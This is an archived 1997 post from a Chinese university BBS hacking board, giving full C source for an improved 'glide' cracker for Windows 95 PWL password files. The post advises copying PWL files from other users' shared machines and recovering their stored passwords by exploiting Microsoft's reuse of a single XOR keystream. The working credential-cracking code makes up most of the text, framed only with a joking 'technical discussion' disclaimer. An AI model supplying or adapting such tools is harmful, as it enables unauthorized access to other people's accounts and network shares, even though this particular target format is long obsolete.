发信人: badle()
整理人: starseacn(2001-09-21 21:24:48), 站内信件
|
发信人: raner (lilo), 信区: Hacker
标 题: glide程序的改进
发信站: BBS 水木清华站 (Tue Aug 19 11:36:26 1997)
由Registration Database system.dat极易解出Shared Directory, 因此若Wi
n95
目录被共享(不需口令)则解出其余需口令的目录Easy FM! 但若Win95目录没共享
呢?
Answer is: to use glide 将别的机器上的PWL文件拷回来,用glide解其资源,
很
有可能找到泥所需的password,甚至是Full Accesss Password(仅为技术讨论 :-
) )
但glide程序在反解资源指针时有点问题,以下程序为对其的改进。在
password未知情况下的反解并不能保证对(这种反解利用了M$的愚蠢的错误,将同
一 Xor串用于加密许多不同串), 但在大多情况下应没问题.
================ PWL.CPP 1997.8.16 =====================
// Compiled with BC 3.1
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <dir.h>
unsigned char Data[10001]; // pwl file buffer, 10K should enough!
unsigned char keystream[1001]; // xor key stream
int Rpoint[300]; // Resource pointers
int size,maxr,cracked;
void RecoverKeyStream()
{
int sizemask,i,rsz,pos;
int Rall[300];
int keylen,len;
/* find allocated recources */
sizemask=keystream[0]+(keystream[1]<<8);
for(i=0;i<256;i++) Rall[i]=0;
maxr=-1;
for(i=0x109;i<0x208;i++)
{
if(Data[i]!=0xff)
{
Rall[Data[i]]++;
if (Data[i]>maxr) maxr=Data[i];
}
}
if (maxr == -1) return; // no resource
maxr=(((maxr/16)+1)*16);
// recource pointer table size appears to be divisable by 16
/* search after recources */
keylen = 2 * maxr + 20 + 2;
Rpoint[0]=0x0208+keylen; /* first recource */
for(i=0;i<maxr;i++)
{
/* find size of current recource */
pos=Rpoint[i];
if (pos >= size)
{
printf("Decrypt pwl file error!\n");
maxr = i;
break;
}
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
pos+=rsz+2;
if(i<maxr-1)
{
while(pos < size)
{
len = (*(unsigned int*)(Data+pos)) ^ sizemask;
if (Rall[i+1] == 0 && len == 0)
break; // correct position
if (Rall[i+1] > 0 && len >= 2 && len <= keylen)
break; // may be correct position ?
pos+=2; // else, increase by 2
}
}
Rpoint[i+1]=pos;
}
Rpoint[maxr]=size;
/* insert Table data into keystream */
for(i=0;i <= maxr;i++)
{
keystream[20+2*i]^=Rpoint[i] & 0x00ff;
keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
}
cracked+=maxr*2+2;
}
void DecryptResources()
{
int i,j,rsz;
/* decrypt resources */
for(i=0;i<maxr;i++)
{
rsz=Rpoint[i+1]-Rpoint[i];
if (rsz>cracked) rsz=cracked;
if (rsz > 2)
{
printf("Recource[%02d] (length: %02d)\n",i,rsz);
for(j=0;j<rsz;j++)
{
unsigned char c = Data[Rpoint[i]+j]^keystream[j];
printf("%c", c >= 0x20 && c <= 0x7e ? c : '.');
}
printf("\n");
}
}
}
int main (int argc,char *argv[])
{
struct ffblk ffblk;
int i,done,index = 0;
FILE *fd;
char *name,ch;
if (argc<2)
{
printf("Usage: Pwl pwlfile(s) (eg: *.pwl)");
return 1;
}
done = findfirst(argv[1],&ffblk,0);
while (!done)
{
name = ffblk.ff_name;
printf("\n-----------File %2d: %11s------------\n", ++index,na
me);
/* read PWL file */
fd=fopen(name,"rb");
if (fd==NULL)
printf("can't open file %s",name);
else
{
size=0;
while(!feof(fd))
{
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);
/* copy encrypted text into keystream */
cracked=size-0x0208;
if(cracked<0) cracked=0;
if(cracked>1000) cracked=1000;
memcpy(keystream,Data+0x208,cracked);
/* generate 20 bytes of keystream */
for(i=0;i<20;i++)
{
ch=toupper(name[i]);
if(ch==0) break;
if(ch=='.') break;
keystream[i]^=ch; // xor UserName
}
cracked=20;
RecoverKeyStream();
// recover key stream (54 bytes or more)
if (maxr == -1)
printf("No resource!\n");
else DecryptResources();
}
done = findnext(&ffblk);
}
return 0;
}
--
※ 来源:·BBS 水木清华站 bbs.net.tsinghua.edu.cn·[FROM: 166.111.5.15]
--
飞天神舞──只有我喜欢!
广州网易主机http://badle.yeah.net
湖北襄樊主机http://badle.126.com
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.101.155.44]
|
|